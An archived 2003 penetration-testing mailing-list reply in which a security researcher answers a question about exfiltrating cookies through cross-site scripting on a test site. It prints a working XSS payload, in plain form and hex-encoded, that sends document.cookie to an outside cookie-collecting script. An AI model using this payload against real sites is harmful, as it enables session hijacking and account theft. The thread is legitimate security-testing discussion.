RE: Proof of Concept Tool on Web Application Security
From: Robert Auger (rauger@spidynamics.com)
Date: 04/14/03
- Previous message: Nicolas Gregoire: "RE: Proof of Concept Tool on Web Application Security"
- In reply to: Indian Tiger: "RE: Proof of Concept Tool on Web Application Security"
- Next in thread: Jon Pastore: "Re: Proof of Concept Tool on Web Application Security"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: "Robert Auger" <rauger@spidynamics.com>
To: "'Indian Tiger'" <indiantiger@mailandnews.com>, <pen-test@securityfocus.com>, <rdawes@deloitte.co.za>
Date: Mon, 14 Apr 2003 11:12:52 -0400
> Now I am testing Cross-Site Scripting to steal the client cookies, or any
> other sensitive information. I am working on my own pen-test testing site,
> which is vulnerable to XSS. I was able to display the cookies of the client at
> the victim's machine, but that was not my goal; my goal is to get those
> cookies on my machine or any desired location. So is there any way by which I
> can transfer the victim's cookie or any other information to my machine
> without the victim's interaction?
This is covered in the cross site scripting FAQ located at
http://www.cgisecurity.com/articles/xss-faq.shtml.

The relevant JavaScript code you are looking for is as follows (an example
from the paper):

<script>document.location='http://www.cgisecurity.com/cgi-bin/cookie.cgi?' +document.cookie</script>

(IN HEX)

%3c%73%63%72%69%70%74%3e%64%6f%63%75%6d%65%6e%74%2e%6c%6f%63%61%74%69%6f%6e%3d%27%68%74%74%70%3a%2f%2f%77%77%77%2e%63%67%69%73%65%63%75%72%69%74%79%2e%63%6f%6d%2f%63%67%69%2d%62%69%6e%2f%63%6f%6f%6b%69%65%2e%63%67%69%3f%27%20%2b%64%6f%63%75%6d%65%6e%74%2e%63%6f%6f%6b%69%65%3c%2f%73%63%72%69%70%74%3e

(Note: This website has a public script that can be used for testing cookie
theft.)
Regards,
Robert Auger
SPI Labs